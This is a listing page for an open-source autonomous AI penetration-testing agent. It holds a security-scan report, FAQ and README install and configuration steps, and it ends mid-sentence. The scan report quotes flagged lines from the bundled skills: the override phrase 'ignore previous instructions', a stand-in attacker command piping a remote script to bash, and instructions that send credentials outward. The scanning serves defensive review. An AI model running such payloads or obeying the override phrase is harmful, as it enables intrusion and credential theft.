by xalgord
Autonomous AI pentesting agents — real-time reconnaissance, vulnerability detection, and exploitation orchestration. Go + TypeScript.
# Add to your Claude Code skills
git clone https://github.com/xalgord/xalgorixLast scanned: 7/8/2026
{
"issues": [
{
"file": "internal/tools/skills/data/ai-security/detecting-ai-model-prompt-injection-attacks/SKILL.md",
"line": 62,
"type": "prompt-injection",
"message": "Possible instruction-override phrase: \"ignore previous instructions\"",
"severity": "medium"
},
{
"file": "internal/tools/skills/data/ai-security/exploiting-ai-model-file-rce/SKILL.md",
"line": 47,
"type": "remote-install",
"message": "Install command (remote install script piped to a shell — review the source before running): \"curl http://ATTACKER/x|bash\"",
"severity": "medium"
},
{
"file": "internal/tools/skills/data/ai-security/testing-mcp-server-security/SKILL.md",
"line": 41,
"type": "secret-exfiltration",
"message": "Instruction appears to send credentials/secrets to an external endpoint",
"severity": "medium"
},
{
"file": "internal/tools/skills/data/api-security/implementing-api-key-security-controls/SKILL.md",
"line": 288,
"type": "secret-exfiltration",
"message": "Instruction appears to send credentials/secrets to an external endpoint",
"severity": "medium"
}
],
"status": "PASSED",
"scannedAt": "2026-07-08T06:28:09.454Z",
"npmAuditRan": true,
"pipAuditRan": true,
"promptInjectionRan": true
}xalgorix is an open-source ai agents skill for AI coding assistants such as Claude Code, Codex CLI, and ChatGPT, built by xalgord. Autonomous AI pentesting agents — real-time reconnaissance, vulnerability detection, and exploitation orchestration. Go + TypeScript. It has 693 GitHub stars.
Yes. xalgorix passed SkillsLLM's automated security scan — a dependency vulnerability audit plus prompt-injection heuristics — with no high-severity issues. You can read the full report in the Security Report section on this page.
Clone the repository with "git clone https://github.com/xalgord/xalgorix" and add it to your Claude Code skills directory (see the Installation section above).
xalgorix is primarily written in Go. It is open-source under xalgord on GitHub, so you can review or fork the full source.
Yes. SkillsLLM lists many other AI Agents skills you can browse and compare side by side. Open the AI Agents category from the badge at the top of this page, or use the Related Skills and comparison links further down to weigh xalgorix against similar tools.
No comments yet. Be the first to share your thoughts!
git clone https://github.com/xalgord/xalgorix.git
cd xalgorix
make build
sudo install -m 755 build/xalgorix /usr/local/bin/xalgorix
Create ~/.xalgorix.env:
XALGORIX_LLM=minimax/MiniMax-M2.7
XALGORIX_API_KEY=your_provider_api_key
Start the dashboard:
xalgorix --web
Open http://127.0.0.1:9137.
[!IMPORTANT] Use Xalgorix only on systems you own or have explicit permission to test.
[!TIP] Prefer not to self-host? A fully managed version is available at www.xalgorix.com — click-to-scan, no install or API keys required.
Xalgorix is a self-hosted AI penetration testing platform for authorized security testing, vulnerability assessment, and bug bounty workflows. It combines an LLM-driven autonomous agent, browser automation, terminal tooling, a comprehensive 22-phase testing methodology, live WebSocket telemetry, finding management with CVSS scoring, branded PDF report generation, and integrations for AgentMail, Discord, and Telegram.
Unlike cloud-only DAST scanners, Xalgorix runs entirely on your machine. You bring your own LLM provider (OpenAI, Anthropic, DeepSeek, Gemini, Groq, Ollama, MiniMax) and control the model, reasoning effort, rate limits, and proxy configuration. No scan data, API keys, or target information leaves your infrastructure.
The default experience is the Web UI. From one local dashboard you can start scans, monitor active runs, inspect findings, configure model/provider settings, manage environment variables, generate branded PDF reports, and delete or resume historical scans.
| Use Case | How Xalgorix helps |
|---|---|
| Penetration testing | Run a full 22-phase methodology against authorized targets. The AI agent handles reconnaissance, vulnerability discovery, injection testing, SSRF, IDOR, auth bypass, race conditions, and more — then verifies findings before reporting. |
| Bug bounty hunting | Point Xalgorix at an in-scope target and let the agent enumerate the attack surface, test for common vulnerability classes, and surface verified findings with CVSS scores and proof-of-concept evidence. |
| Red team operations | Use wildcard and multi-target scan modes to map an organization's external attack surface. Browser-assisted DAST handles auth flows, forms, and runtime behavior that static scanners miss. |
| Security research | The novel-vulnerability-discovery phase pushes the agent beyond known template matching. Bring your own LLM (OpenAI, Anthropic, DeepSeek, Gemini, Ollama, MiniMax) to control reasoning depth and cost. |
| Continuous security testing | Run as a system service with xalgorix --start. Scan on a schedule, stream findings to Discord or Telegram, and generate branded PDF reports for stakeholders. |
| DAST automation | Browser-driven testing for web applications — auth flows, forms, JavaScript-rendered content, and runtime behavior. Integrates with Caido for proxy traffic inspection. |
| Overview dashboard | Scan detail | Findings |
|---|---|---|
![]() |
![]() |
![]() |
| Area | Capabilities |
|---|---|
| Dashboard | Local Web UI on 127.0.0.1:9137 by default, scan management, live status, bulk scan actions, and historical scan recovery. |
| Scanning | Single target, DAST, wildcard, and multi-target flows with selectable methodology phases. |
| Live telemetry | Tool calls, agent messages, findings, errors, HTTP activity, and LLM activity over WebSockets. |
| Findings | Scan detail pages, severity filters, CVSS details, finding index, and verified finding workflows. |
| Reporting | Branded PDF reports with target/company name, uploaded logo, report list, open/download/delete actions. |
| Integrations | AgentMail test inboxes, verification emails, OTP flows, email triage events, Discord and Telegram notifications. |
| Configuration | Dashboard settings for LLM, AgentMail, Discord, Telegram, proxy, runtime, browser, auth, rate limits, and resources. |
| Runtime safety | Resource-aware instance limits and loopback-only binding unless external access is explicitly configured with auth. |
| Requirement | Notes |
|---|---|
| Linux | Primary supported platform. |
| Go | 1.24.2 or newer. |
| Node.js + npm | Required when building the bundled React Web UI from source. |
| Security tools | Installed on demand only when auto-install is enabled. |
Check your Go version:
go version
git clone https://github.com/xalgord/xalgorix.git
cd xalgorix
make build
sudo install -m 755 build/xalgorix /usr/local/bin/xalgorix
make build builds the React Web UI into internal/web/static, then builds the Go binary.
GOPROXY=direct GOSUMDB=off go install github.com/xalgord/xalgorix/v4/cmd/xalgorix@latest
Xalgorix loads configuration in this order. Later sources override earlier ones.
| Order | Source |
|---|---|
| 1 | /etc/xalgorix.env |
| 2 | /home/<sudo-user>/.xalgorix.env when launched through sudo |
| 3 | ~/.xalgorix.env |
| 4 | Environment variables already present in the process |
Create the local environment file:
nano ~/.xalgorix.env
XALGORIX_LLM=minimax/MiniMax-M2.7
XALGORIX_API_KEY=your_provider_api_key
OpenAI:
XALGORIX_LLM=openai/gpt-5.4
XALGORIX_API_KEY=sk-...
Custom OpenAI-compatible provider:
XALGORIX_LLM=custom/security-model
XALGORIX_API_BASE=https://your-provider.example/v1
XALGORIX_API_KEY=your_provider_api_key
GEMINI_API_KEY=AIza...
AGENTMAIL_POD=am_us_pod_47
AGENTMAIL_API_KEY=ak_...
XALGORIX_DISCORD_WEBHOOK=https://discord.com/api/webhooks/...
XALGORIX_DISCORD_MIN_SEVERITY=high
XALGORIX_USERNAME=admin
XALGORIX_PASSWORD=change-this-password
[!TIP] Prefer
XALGORIX_PASSWORD_HASHfor production deployments.
This release ships a stability and workspac